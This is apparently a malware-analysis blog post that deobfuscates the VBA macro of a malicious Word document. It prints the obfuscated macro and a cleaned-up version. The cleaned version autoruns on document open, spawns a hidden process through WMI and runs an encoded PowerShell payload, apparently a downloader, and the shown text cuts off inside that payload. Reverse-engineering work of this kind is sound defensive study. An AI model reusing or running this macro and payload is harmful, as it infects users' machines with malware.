L62g0slrpxeqamio = "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggi58[sn ]]][ jsa 21u7gsgggnm58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggggm58[sn ]]][ jsa 21u7gsgggt58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg" + Av6yyzbc41rzex167 + "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg:58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggin58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg358[sn ]]][ jsa 21u7gsggg258[sn ]]][ jsa 21u7gsggg_58[sn ]]][ jsa 21u7gsggg" + Exploit.Bg_ky7487858u + "58[sn ]]][ jsa 21u7gsgggro58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggce58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsggg"
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 742
var3 = 453
var1 = var1 + var3
Vyge9vkrd5kgtqs3 = var1
Qhkzo4ctpnl35 = Func3(L62g0slrpxeqamio)
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 844
var3 = 836
var1 = var1 + var3
Set A7izx6nxahgivmp8y = CreateObject(Qhkzo4ctpnl35)
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 540
var3 = 965
var1 = var1 + var3
Ud44yuwmt6aawti4 = Exploit.A6e045c4qyyy8g.ControlTipText
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 606
var3 = 720
var1 = var1 + var3
S2jw22lls9lk = W1pwr2pr77iqoocq75 + (Qhkzo4ctpnl35 + Av6yyzbc41rzex167 + Exploit.Xrpwix34d36wine8bi.ControlTipText + Ud44yuwmt6aawti4)
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 618
var3 = 44
var1 = var1 + var3
Dqyyju1s5tap = S2jw22lls9lk + Exploit.Bg_ky7487858u
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 919
var3 = 434
var1 = var1 + var3
Set Byzc0ihe54z50qk = Func2(Dqyyju1s5tap)
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 92
var3 = 771
var1 = var1 + var3
J6e_mh1uf6sgo = Array(Jyavf690bfuck + "Lbnmm6yd32cp3hkxo1 Cb1c620np50qk83ddE6uzj8js1d2yo3 Gg82_svnrij4l4s_d", A7izx6nxahgivmp8y. _
Create(Func4, Di7kp444ma7x, Byzc0ihe54z50qk), Lhwb17nd_uscq_e0 + "Fdxsit003e9hfvr5 Vv124e2cgyoh04 Vx44ajhyxd93q85_ G0ftj0p_8pc")
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 870
var3 = 705
var1 = var1 + var3
End Function





Function Func2(Func2_Arg1)
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 626
var3 = 387
var1 = var1 + var3
Set Func2 = CreateObject(Func2_Arg1)
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 220
var3 = 507
var1 = var1 + var3
Func2. _
showwindow = P24ljns3z5ix9cy6ml + Iyn0_xguzo4e
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 728
var3 = 604
var1 = var1 + var3
End Function





Function Func3(Func3_Arg1)
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 471
var3 = 459
var1 = var1 + var3
Dtx46j5q03mhtjc = Func3_Arg1
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 656
var3 = 45
var1 = var1 + var3
Ti5k7_w7nrtdsd044a = Split _
(Dtx46j5q03mhtjc, "58[sn ]]][ jsa 21u7gsggg")
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 462
var3 = 524
var1 = var1 + var3
Z_51aeclufaq4 = D4bmfqgtlimp2tvgk + Join(Ti5k7_w7nrtdsd044a, Qwi1hh34zd55o71)
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 445
var3 = 448
var1 = var1 + var3
Func3 = Z_51aeclufaq4
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 337
var3 = 361
var1 = var1 + var3
End Function







Function Func4()
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 371
var3 = 721
var1 = var1 + var3
Ia2irtdfelk8geil = Exploit.Xza7j9985gfykpub.Caption
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 32
var3 = 638
var1 = var1 + var3
Func4 = Func3(Ia2irtdfelk8geil)
   For var2 = 5 To 62
DoEvents

Next var2
var1 = 152
var3 = 21
var1 = var1 + var3
End Function

The code was starting to look like something a human might be able to make sense of. Again, my goal was not to come up with pretty variable names, but to be able to go through the code and determine what it was doing and to recreate it in C#.

Taking Care of NOPS Part 2

Now that we could make a little more sense of the code, and how it functioned, it was time to look a bit deeper and see if there was any more nonsense code that could be taken out.

As I studied the code I realized that there were a lot of for loops. What I originally believed to be part of an algorithm to generate a domain, IP, powershell script, or something of that nature, turned out to be nothing more than a trick to confuse me.

I studied each of the for loops, and removed them one by one from the code. The code was really starting to look like readable now. But there was still more to do.

I began reading through the code and noticing a lot of sequences with the same structure as this.

var1 = 471
var3 = 459
var1 = var1 + var3

You can see that they repeat and most of the time nothing is done with the result of this operation before it is called again. This was another method of obfuscating the code. Most of these did nothing so I dutifully removed them from the code.

The Visual Editor

There was one last thing to do before I considered the code de-obfuscated. Sprinkled throughout the script there were variables that looked like this Exploit.Bg_ky7487858u. My assumption was that these were visual elements of the macro.

I opened the malicious doc file in LibreOffice and opened the macro in the VB editor. I went through each of the visual elements, and replaced the values in the script with the corresponding attribute from the various visual elements.

Here is the complete script after all my efforts to make sense of it.

Expand Code
<pre class='wp-block-code'><code lang='visual-basic' class='language-visual-basic line-numbers'>Attribute VB_Name = 'Se25b9jyhzyfbn1'<br> Attribute VB_Base = '0{B7F0DA11-3823-4DA4-B320-37E0B4727005}{2C41A817-AEFE-45B5-906F-C0F3C2E5C8A6}'<br> Attribute VB_GlobalNameSpace = False<br> Attribute VB_Creatable = False<br> Attribute VB_PredeclaredId = True<br> Attribute VB_Exposed = False<br> Attribute VB_TemplateDerived = False<br> Attribute VB_Customizable = False</code> </pre>
Attribute VB_Name = "Pa_lw82d6im699edf"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




Private Sub _
Document_open()
Exploit.Run
End Sub





Attribute VB_Name = "Exploit"
Attribute VB_Base = "0{B7F0DA11-3823-4DA4-B320-37E0B4727005}{2C41A817-AEFE-45B5-906F-C0F3C2E5C8A6}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False






Function Run()

l_var1 = 0 + 50 + 50

l_var2 = ChrW(l_var1 + (15))

l_var9 = "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggi58[sn ]]][ jsa 21u7gsgggnm58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggggm58[sn ]]][ jsa 21u7gsgggt58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg" + var5 + "58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg:58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsgggin58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsggg358[sn ]]][ jsa 21u7gsggg258[sn ]]][ jsa 21u7gsggg_58[sn ]]][ jsa 21u7gsggg" + "P" + "58[sn ]]][ jsa 21u7gsgggro58[sn ]]][ jsa 21u7gsggg58[sn ]]][ jsa 21u7gsgggce58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsggg"

l_var3 = Func3(l_var9)

Set l_var4 = CreateObject(l_var3)

l_var5 = "tu"

l_var6 = (l_var3 + l_var2 + "tar" + l_var5)

l_var7 = l_var6 + "P"

Set l_var8 = Func2(l_var7)

J6e_mh1uf6sgo = Array(Jyavf690bfuck + "Lbnmm6yd32cp3hkxo1 Cb1c620np50qk83ddE6uzj8js1d2yo3 Gg82_svnrij4l4s_d", l_var4. _
Create(Func4, Di7kp444ma7x, l_var8), Lhwb17nd_uscq_e0 + "Fdxsit003e9hfvr5 Vv124e2cgyoh04 Vx44ajhyxd93q85_ G0ftj0p_8pc")

End Function






Function Func2(Func2_Arg1)

Set Func2 = CreateObject(Func2_Arg1)

Func2. _showwindow = P24ljns3z5ix9cy6ml + Iyn0_xguzo4e

End Function






Function Func3(Func3_Arg1)

l_var1 = Func3_Arg1

split_l_var1 = Split _(l_var1, "58[sn ]]][ jsa 21u7gsggg")

l_var2 = Join(split_l_var1, Qwi1hh34zd55o71)

Func3 = l_var2

End Function






Function Func4()


l_var1 = "p58[sn ]]][ jsa 21u7gsgggo58[sn ]]][ jsa 21u7gsgggw58[sn ]]][ jsa 21u7gsggge58[sn ]]][ jsa 21u7gsgggr58[sn ]]][ jsa 21u7gsgggs58[sn ]]][ jsa 21u7gsgggh58[sn ]]][ jsa 21u7gsgggeL58[sn ]]][ jsa 21u7gsgggL58[sn ]]][ jsa 21u7gsggg 58[sn ]]][ jsa 21u7gsggg-58[sn ]]][ jsa 21u7gsggge58[sn ]]][ jsa 21u7gsggg JABFA58[sn ]]][ jsa 21u7gsgggHQANw58[sn ]]][ jsa 21u7gsgggBrADA58[sn ]]][ jsa 21u7gsgggAegBk58[sn ]]][ jsa 21u7gsgggAD0AK58[sn ]]][ jsa 21u7gsgggAAnAE58[sn ]]][ jsa 21u7gsgggQAJwA58[sn ]]][ jsa 21u7gsgggrACcA58[sn ]]][ jsa 21u7gsgggNgA3A58[sn ]]][ jsa 21u7gsgggHMAaA58[sn ]]][ jsa 21u7gsgggAnACs58[sn ]]][ jsa 21u7gsgggAJwB258[sn ]]][ jsa 21u7gsgggADIAJ58[sn ]]][ jsa 21u7gsgggwApAD58[sn ]]][ jsa 21u7gsgggsAJgA58[sn ]]][ jsa 21u7gsgggoACcA58[sn ]]][ jsa 21u7gsgggbgBlA58[sn ]]][ jsa 21u7gsgggHcALQ58[sn ]]][ jsa 21u7gsgggAnACs58[sn ]]][ jsa 21u7gsgggAJwBp58[sn ]]][ jsa 21u7gsgggAHQAJ58[sn ]]][ jsa 21u7gsgggwArAC58[sn ]]][ jsa 21u7gsgggcAZQB58[sn ]]][ jsa 21u7gsgggtACcA58[sn ]]][ jsa 21u7gsgggKQAgA58[sn ]]][ jsa 21u7gsgggCQARQ58[sn ]]][ jsa 21u7gsgggBOAFY58[sn ]]][ jsa 21u7gsgggAOgBU58[sn ]]][ jsa 21u7gsgggAGUAb58[sn ]]][ jsa 21u7gsgggQBQAF58[sn ]]][ jsa 21u7gsgggwATwB58[sn ]]][ jsa 21u7gsgggGAGYA58[sn ]]][ jsa 21u7gsgggaQBDA58[sn ]]][ jsa 21u7gsgggEUAMg58[sn ]]][ jsa 21u7gsgggAwADE58[sn ]]][ jsa 21u7gsgggAOQAg58[sn ]]][ jsa 21u7gsgggAC0Aa58[sn ]]][ jsa 21u7gsgggQB0AG58[sn ]]][ jsa 21u7gsgggUAbQB58[sn ]]][ jsa 21u7gsggg0AHkA58[sn ]]][ jsa 21u7gsgggcABlA58[sn ]]][ jsa 21u7gsgggCAARA58[sn ]]][ jsa 21u7gsgggBpAFI58[sn ]]][ jsa 21u7gsgggARQBj58[sn ]]][ jsa 21u7gsgggAFQAb58[sn ]]][ jsa 21u7gsgggwBSAF58[sn ]]][ jsa 21u7gsgggkAOwB58[sn ]]][ jsa 21u7gsgggbAE4A58[sn ]]][ jsa 21u7gsgggZQB0A58[sn ]]][ jsa 21u7gsgggC4AUw58[sn ]]][ jsa 21u7gsgggBlAHI58[sn ]]][ jsa 21u7gsgggAdgBp58[sn ]]][ jsa 21u7gsgggAGMAZ58[sn ]]][ jsa 21u7gsgggQBQAG58[sn ]]][ jsa 21u7gsggg8AaQB58[sn ]]][ jsa 21u7gsggguAHQA58[sn ]]][ jsa 21u7gsgggTQBhA58[sn ]]][ jsa 21u7gsgggG4AYQ58[sn ]]][ jsa 21u7gsgggBnAGU58[sn ]]][ jsa 21u7gsgggAcgBd58[sn ]]][ jsa 21u7gsgggADoAO58[sn ]]][ jsa 21u7gsggggAiAF58[sn ]]][ jsa 21u7gsgggMARQB58[sn ]]][ jsa 21u7gsggggAGMA58[sn ]]][ jsa 21u7gsgggdQBSA58[sn ]]][ jsa 21u7gsgggGkAVA58[sn ]]][ jsa 21u7gsgggB5AHA58[sn ]]][ jsa 21u7gsgggAcgBv58[sn ]]][ jsa 21u7gsgggAFQAY58[sn ]]][ jsa 21u7gsgggABPAG58[sn ]]][ jsa 21u7gsgggMAYAB58[sn ]]][ jsa 21u7gsgggvAGwA58[sn ]]][ jsa 21u7gsgggIgAgA58[sn ]]][ jsa 21u7gsgggD0AIA58[sn ]]][ jsa 21u7gsgggAoACc58[sn ]]][ jsa 21u7gsgggAdABs58[sn ]]][ jsa 21u7gsgggAHMAM58[sn ]]][ jsa 21u7gsgggQAyAC58[sn ]]][ jsa 21u7gsgggwAIAB58[sn ]]][ jsa 21u7gsggg0ACcA58[sn ]]][ jsa 21u7gsgggKwAnA58[sn ]]][ jsa 21u7gsgggGwAcw58[sn ]]][ jsa 21u7gsgggAxACc58[sn ]]][ jsa 21u7gsgggAKwAn58[sn ]]][ jsa 21u7gsgggADEAL58[sn ]]][ jsa 21u7gsgggAAgAH58[sn ]]][ jsa 21u7gsgggQAJwA58[sn ]]][ jsa 21u7gsgggrACcA58[sn ]]][ jsa 21u7gsgggbABzA58[sn ]]][ jsa 21u7gsgggCcAKQ58[sn ]]][ jsa 21u7gsgggA7ACQ58[sn ]]][ jsa 21u7gsgggAVgBu58[sn ]]][ jsa 21u7gsgggAGIAe58[sn ]]][ jsa 21u7gsgggQBhAG58[sn ]]][ jsa 21u7gsggggAeAA58[sn ]]][ jsa 21u7gsggggAD0A58[sn ]]][ jsa 21u7gsgggIAAoA58[sn ]]][ jsa 21u7gsgggCcASQ58[sn ]]][ jsa 21u7gsgggBuACc58[sn ]]][ jsa 21u7gsgggAKwAn58[sn ]]][ jsa 21u7gsgggAHUAZ58[sn ]]][ jsa 21u7gsgggQBkAD58[sn ]]][ jsa 21u7gsgggkAcQA58[sn ]]][ jsa 21u7gsgggnACkA58[sn ]]][ jsa 21u7gsgggOwAkA58[sn ]]][ jsa 21u7gsgggEsAdQ58[sn ]]][ jsa 21u7gsgggBsAHg58[sn ]]][ jsa 21u7gsgggAXwB058[sn ]]][ jsa 21u7gsgggAHYAP58[sn ]]][ jsa 21u7gsgggQAoAC58[sn ]]][ jsa 21u7gsgggcASwA58[sn ]]][ jsa 21u7gsgggzACcA58[sn ]]][ jsa 21u7gsgggKwAnA58[sn ]]][ jsa 21u7gsgggGcANg58[sn ]]][ jsa 21u7gsgggAyACc58[sn ]]][ jsa 21u7gsgggAKwAn58[sn ]]][ jsa 21u7gsgggAF8Ae58[sn ]]][ jsa 21u7gsggggAnAC58[sn ]]][ jsa 21u7gsgggkAOwA58[sn ]]][ jsa 21u7gsgggkAEUA58[sn ]]][ jsa 21u7gsgggbwA0A58[sn ]]][ jsa 21u7gsgggGcAMQ58[sn ]]][ jsa 21u7gsgggAwAHo58[sn ]]][ jsa 21u7gsgggAPQAk58[sn ]]][ jsa 21u7gsgggAGUAb58[sn ]]][ jsa 21u7gsggggB2AD58[sn ]]][ jsa 21u7gsgggoAdAB58[sn ]]][ jsa 21u7gsggglAG0A58[sn ]]][ jsa 21u7gsgggcAArA58[sn ]]][ jsa 21u7gsgggCgAKA58[sn ]]][ jsa 21u7gsgggAnAEI58[sn ]]][ jsa 21u7gsgggAcQBN58[sn ]]][ jsa 21u7gsgggACcAK58[sn ]]][ jsa 21u7gsgggwAnAE58[sn ]]][ jsa 21u7gsggg8AZgB58[sn ]]][ jsa 21u7gsgggmAGkA58[sn ]]][ jsa 21u7gsgggJwArA58[sn ]]][ jsa 21u7gsgggCcAYw58[sn ]]][ jsa 21u7gsgggBlADI58[sn ]]][ jsa 21u7gsgggAMAAn58[sn ]]][ jsa 21u7gsgggACsAJ58[sn ]]][ jsa 21u7gsgggwAxAD58[sn ]]][ jsa 21u7gsgggkAQgA58[sn ]]][ jsa 21u7gsgggnACsA58[sn ]]][ jsa 21u7gsgggJwBxA58[sn ]]][ jsa 21u7gsgggE0AJw58[sn ]]][ jsa 21u7gsgggApACA58[sn ]]][ jsa 21u7gsgggAIAAt58[sn ]]][ jsa 21u7gsgggAHIAR58[sn ]]][ jsa 21u7gsgggQBQAG58[sn ]]][ jsa 21u7gsgggwAYQB58[sn ]]][ jsa 21u7gsgggDAGUA58[sn ]]][ jsa 21u7gsgggIAAoA58[sn ]]][ jsa 21u7gsgggFsAYw58[sn ]]][ jsa 21u7gsgggBIAGE58[sn ]]][ jsa 21u7gsgggAUgBd58[sn ]]][ jsa 21u7gsgggADYAN58[sn ]]][ jsa 21u7gsggggArAF58[sn ]]][ jsa 21u7gsgggsAYwB58[sn ]]][ jsa 21u7gsgggIAGEA58[sn ]]][ jsa 21u7gsgggUgBdA58[sn ]]][ jsa 21u7gsgggDEAMQ58[sn ]]][ jsa 21u7gsgggAzACs58[sn ]]][ jsa 21u7gsgggAWwBj58[sn ]]][ jsa 21u7gsgggAEgAY58[sn ]]][ jsa 21u7gsgggQBSAF58[sn ]]][ jsa 21u7gsggg0ANwA58[sn ]]][ jsa 21u7gsggg3ACkA58[sn ]]][ jsa 21u7gsgggLABbA58[sn ]]][ jsa 21u7gsgggGMASA58[sn ]]][ jsa 21u7gsgggBhAFI58[sn ]]][ jsa 21u7gsgggAXQA558[sn ]]][ jsa 21u7gsgggADIAK58[sn ]]][ jsa 21u7gsgggQArAC58[sn ]]][ jsa 21u7gsgggQAVgB58[sn ]]][ jsa 21u7gsggguAGIA58[sn ]]][ jsa 21u7gsgggeQBhA58[sn ]]][ jsa 21u7gsgggGgAeA58[sn ]]][ jsa 21u7gsgggArACg58[sn ]]][ jsa 21u7gsgggAJwAu58[sn ]]][ jsa 21u7gsgggAGUAJ58[sn ]]][ jsa 21u7gsgggwArAC58[sn ]]][ jsa 21u7gsgggcAeAB58[sn ]]][ jsa 21u7gsggglACcA58[sn ]]][ jsa 21u7gsgggKQA7A58[sn ]]][ jsa 21u7gsgggCQASA58[sn ]]][ jsa 21u7gsgggBzAGE58[sn ]]][ jsa 21u7gsgggANwBk58[sn ]]][ jsa 21u7gsgggAGcAN58[sn ]]][ jsa 21u7gsggggA9AC58[sn ]]][ jsa 21u7gsggggAJwB58[sn ]]][ jsa 21u7gsgggRAHcA58[sn ]]][ jsa 21u7gsgggbAB4A58[sn ]]][ jsa 21u7gsgggCcAKw58[sn ]]][ jsa 21u7gsgggAnAHg58[sn ]]][ jsa 21u7gsgggAdAA158[sn ]]][ jsa 21u7gsgggACcAK58[sn ]]][ jsa 21u7gsgggQA7AC58[sn ]]][ jsa 21u7gsgggQAQgB58[sn ]]][ jsa 21u7gsggg3AGEA58[sn ]]][ jsa 21u7gsgggMQBzA58[sn ]]][ jsa 21u7gsgggDgAZA58[sn ]]][ jsa 21u7gsgggA9AC458[sn ]]][ jsa 21u7gsgggAKAAn58[sn ]]][ jsa 21u7gsgggAG4AZ58[sn ]]][ jsa 21u7gsgggQAnAC58[sn ]]][ jsa 21u7gsgggsAJwB58[sn ]]][ jsa 21u7gsggg3AC0A58[sn ]]][ jsa 21u7gsgggbwBiA58[sn ]]][ jsa 21u7gsgggGoAZQ58[sn ]]][ jsa 21u7gsgggBjACc58[sn ]]][ jsa 21u7gsgggAKwAn58[sn ]]][ jsa 21u7gsgggAHQAJ58[sn ]]][ jsa 21u7gsgggwApAC58[sn ]]][ jsa 21u7gsgggAATgB58[sn ]]][ jsa 21u7gsggglAFQA58[sn ]]][ jsa 21u7gsgggLgB3A58[sn ]]][ jsa 21u7gsgggEUAQg58[sn ]]][ jsa 21u7gsgggBjAGw58[sn ]]][ jsa 21u7gsgggASQBl58[sn ]]][ jsa 21u7gsgggAE4Ad58[sn ]]][ jsa 21u7gsgggAA7AC58[sn ]]][ jsa 21u7gsgggQATAB58[sn ]]][ jsa 21u7gsgggkAHcA58[sn ]]][ jsa 21u7gsgggZQBhA58[sn ]]][ jsa 21u7gsgggGEAZw58[sn ]]][ jsa 21u7gsgggA9ACg58[sn ]]][ jsa 21u7gsgggAJwBo58[sn ]]][ jsa 21u7gsgggACcAK58[sn ]]][ jsa 21u7gsgggwAnAH58[sn ]]][ jsa 21u7gsgggQAdAB58[sn ]]][ jsa 21u7gsgggwACcA58[sn ]]][ jsa 21u7gsgggKwAnA58[sn ]]][ jsa 21u7gsgggDoALw58[sn ]]][ jsa 21u7gsgggAvAHQ58[sn ]]][ jsa 21u7gsgggAJwAr58[sn ]]][ jsa 21u7gsgggACcAa58[sn ]]][ jsa 21u7gsgggAAnAC58[sn ]]][ jsa 21u7gsgggsAJwB58[sn ]]][ jsa 21u7gsgggpAGMA58[sn ]]][ jsa 21u7gsgggJwArA58[sn ]]][ jsa 21u7gsgggCcAaA58[sn ]]][ jsa 21u7gsgggAnACs58[sn ]]][ jsa 21u7gsgggAJwBk58[sn ]]][ jsa 21u7gsgggACcAK58[sn ]]][ jsa 21u7gsgggwAnAG58[sn ]]][ jsa 21u7gsgggkAcgA58[sn ]]][ jsa 21u7gsgggnACsA58[sn ]]][ jsa 21u7gsgggJwB1A58[sn ]]][ jsa 21u7gsgggG4AJw58[sn ]]][ jsa 21u7gsgggArACc58[sn ]]][ jsa 21u7gsgggAZwAn58[sn ]]][ jsa 21u7gsgggACsAJ58[sn ]]][ jsa 21u7gsgggwAuAC58[sn ]]][ jsa 21u7gsgggcAKwA58[sn ]]][ jsa 21u7gsgggnAGMA58[sn ]]][ jsa 21u7gsgggbwBtA58[sn ]]][ jsa 21u7gsgggC8AJw58[sn ]]][ jsa 21u7gsgggArACc58[sn ]]][ jsa 21u7gsgggAZAB158[sn ]]][ jsa 21u7gsgggAHAAL58[sn ]]][ jsa 21u7gsgggQBpAG58[sn ]]][ jsa 21u7gsggg4AcwB58[sn ]]][ jsa 21u7gsggg0AGEA58[sn ]]][ jsa 21u7gsgggbABsA58[sn ]]][ jsa 21u7gsgggCcAKw58[sn ]]][ jsa 21u7gsgggAnAGU58[sn ]]][ jsa 21u7gsgggAcgAv58[sn ]]][ jsa 21u7gsgggADYAc58[sn ]]][ jsa 21u7gsgggwAyAC58[sn ]]][ jsa 21u7gsgggcAKwA58[sn ]]][ jsa 21u7gsgggnAHAA58[sn ]]][ jsa 21u7gsgggTgBXA58[sn ]]][ jsa 21u7gsgggCcAKw58[sn ]]][ jsa 21u7gsgggAnAEg58[sn ]]][ jsa 21u7gsgggALwAq58[sn ]]][ jsa 21u7gsgggAGgAd58[sn ]]][ jsa 21u7gsgggAB0AH58[sn ]]][ jsa 21u7gsgggAAOgA58[sn ]]][ jsa 21u7gsgggvAC8A58[sn ]]][ jsa 21u7gsgggcwAnA58[sn ]]][ jsa 21u7gsgggCsAJw58[sn ]]][ jsa 21u7gsgggB1AG458[sn ]]][ jsa 21u7gsgggAZwB258[sn ]]][ jsa 21u7gsgggAGEAb58[sn ]]][ jsa 21u7gsgggABvAH58[sn ]]][ jsa 21u7gsgggAAawB58[sn ]]][ jsa 21u7gsgggoACcA58[sn ]]][ jsa 21u7gsgggKwAnA58[sn ]]][ jsa 21u7gsgggG8AJw58[sn ]]][ jsa 21u7gsgggArACc58[sn ]]][ jsa 21u7gsgggAbgBn58[sn ]]][ jsa 21u7gsgggACcAK58[sn ]]][ jsa 21u7gsgggwAnAH58[sn ]]][ jsa 21u7gsgggMAYQB58[sn ]]][ jsa 21u7gsgggtACcA58[sn ]]][ jsa 21u7gsgggKwAnA58[sn ]]][ jsa 21u7gsgggC4AJw58[sn ]]][ jsa 21u7gsgggArACc58[sn ]]][ jsa 21u7gsgggAYwBv58[sn ]]][ jsa 21u7gsgggAG0AL58[sn ]]][ jsa 21u7gsgggwAnAC58[sn ]]][ jsa 21u7gsgggsAJwB58[sn ]]][ jsa 21u7gsggg0AGUA58[sn ]]][ jsa 21u7gsgggJwArA58[sn ]]][ jsa 21u7gsgggCcAbQ58[sn ]]][ jsa 21u7gsgggBwAC858[sn ]]][ jsa 21u7gsgggAdAA558[sn ]]][ jsa 21u7gsgggACcAK58[sn ]]][ jsa 21u7gsgggwAnAD58[sn ]]][ jsa 21u7gsgggAAJwA58[sn ]]][ jsa 21u7gsgggrACcA58[sn ]]][ jsa 21u7gsgggeQBqA58[sn ]]][ jsa 21u7gsgggCcAKw58[sn ]]][ jsa 21u7gsgggAnAHM58[sn ]]][ jsa 21u7gsgggALwAn58[sn ]]][ jsa 21u7gsgggACsAJ58[sn ]]][ jsa 21u7gsgggwAqAC58[sn ]]][ jsa 21u7gsgggcAKwA58[sn ]]][ jsa 21u7gsgggnAGgA58[sn ]]][ jsa 21u7gsgggdAB0A58[sn ]]][ jsa 21u7gsgggHAAOg58[sn ]]][ jsa 21u7gsgggAnACs58[sn ]]][ jsa 21u7gsgggAJwAv58[sn ]]][ jsa 21u7gsgggACcAK58[sn ]]][ jsa 21u7gsgggwAnAC58[sn ]]][ jsa 21u7gsggg8AZAA58[sn ]]][ jsa 21u7gsgggnACsA58[sn ]]][ jsa 21u7gsgggJwByA58[sn ]]][ jsa 21u7gsgggHMAaA58[sn ]]][ jsa 21u7gsgggBlAGs58[sn ]]][ jsa 21u7gsgggAaAAn58[sn ]]][ jsa 21u7gsgggACsAJ58[sn ]]][ jsa 21u7gsgggwBhAC58[sn ]]][ jsa 21u7gsgggcAKwA58[sn ]]][ jsa 21u7gsgggnAHIA58[sn ]]][ jsa 21u7gsgggYgBpA58[sn ]]][ jsa 21u7gsgggHMAJw58[sn ]]][ jsa 21u7gsgggArACc58[sn ]]][ jsa 21u7gsgggAdwBh58[sn ]]][ jsa 21u7gsgggACcAK58[sn ]]][ jsa 21u7gsgggwAnAH58[sn ]]][ jsa 21u7gsgggMAJwA58[sn ]]][ jsa 21u7gsgggrACcA58[sn ]]][ jsa 21u7gsgggLgBjA58[sn ]]][ jsa 21u7gsgggG8AbQ58[sn ]]][ jsa 21u7gsgggAvAGM58[sn ]]][ jsa 21u7gsgggAZwAn58[sn ]]][ jsa 21u7gsgggACsAJ58[sn ]]][ jsa 21u7gsgggwBpAC58[sn ]]][ jsa 21u7gsggg0AYgB58[sn ]]][ jsa 21u7gsgggpAG4A58[sn ]]][ jsa 21u7gsgggJwArA58[sn ]]][ jsa 21u7gsgggCcALw58[sn ]]][ jsa 21u7gsgggBMAGE58[sn ]]][ jsa 21u7gsgggAJwAr58[sn ]]][ jsa 21u7gsgggACcAM58[sn ]]][ jsa 21u7gsgggQAvAC58[sn ]]][ jsa 21u7gsgggoAJwA58[sn ]]][ jsa 21u7gsgggrACcA58[sn ]]][ jsa 21u7gsgggaAB0A58[sn ]]][ jsa 21u7gsgggHQAcA58[sn ]]][ jsa 21u7gsgggBzACc58[sn ]]][ jsa 21u7gsgggAKwAn58[sn ]]][ jsa 21u7gsgggADoAJ58[sn ]]][ jsa 21u7gsgggwArAC58[sn ]]][ jsa 21u7gsgggcALwA58[sn ]]][ jsa 21u7gsgggvAHcA58[sn ]]][ jsa 21u7gsgggdwAnA58[sn ]]][ jsa 21u7gsgggCsAJw58[sn ]]][ jsa 21u7gsgggB3AC458[sn ]]][ jsa 21u7gsgggAcABy58[sn ]]][ jsa 21u7gsgggACcAK58[sn ]]][ jsa 21u7gsgggwAnAG58[sn ]]][ jsa 21u7gsggg8AJwA58[sn ]]][ jsa 21u7gsgggrACcA58[sn ]]][ jsa 21u7gsgggeQBlA58[sn ]]][ jsa 21u7gsgggGMAdA58[sn ]]][ jsa 21u7gsgggBvACc58[sn ]]][ jsa 21u7gsgggAKwAn58[sn ]]][ jsa 21u7gsgggAGIAJ58[sn ]]][ jsa 21u7gsgggwArAC58[sn ]]][ jsa 21u7gsgggcAYQA58[sn ]]][ jsa 21u7gsgggnACsA58[sn ]]][ jsa 21u7gsgggJwB5A58[sn ]]][ jsa 21u7gsgggGEAJw58[sn ]]][ jsa 21u7gsgggArACc58[sn ]]][ jsa 21u7gsgggAYwB158[sn ]]][ jsa 21u7gsgggAC4AY58[sn ]]][ jsa 21u7gsgggwBvAG58[sn ]]][ jsa 21u7gsggg0ALwB58[sn ]]][ jsa 21u7gsggguACcA58[sn ]]][ jsa 21u7gsgggKwAnA58[sn ]]][ jsa 21u7gsgggG8AdA58[sn ]]][ jsa 21u7gsgggBoAGk58[sn ]]][ jsa 21u7gsgggAbgAn58[sn ]]][ jsa 21u7gsgggACsAJ58[sn ]]][ jsa 21u7gsgggwBnAC58[sn ]]][ jsa 21u7gsggg8AJwA58[sn ]]][ jsa 21u7gsgggrACcA58[sn ]]][ jsa 21u7gsgggNQAvA58[sn ]]][ jsa 21u7gsgggCoAaA58[sn ]]][ jsa 21u7gsgggB0ACc58[sn ]]][ jsa 21u7gsgggAKwAn58[sn ]]][ jsa 21u7gsgggAHQAc58[sn ]]][ jsa 21u7gsgggAA6AC58[sn ]]][ jsa 21u7gsggg8ALwA58[sn ]]][ jsa 21u7gsgggnACsA58[sn ]]][ jsa 21u7gsgggJwBkA58[sn ]]][ jsa 21u7gsgggCcAKw58[sn ]]][ jsa 21u7gsgggAnAGk58[sn ]]][ jsa 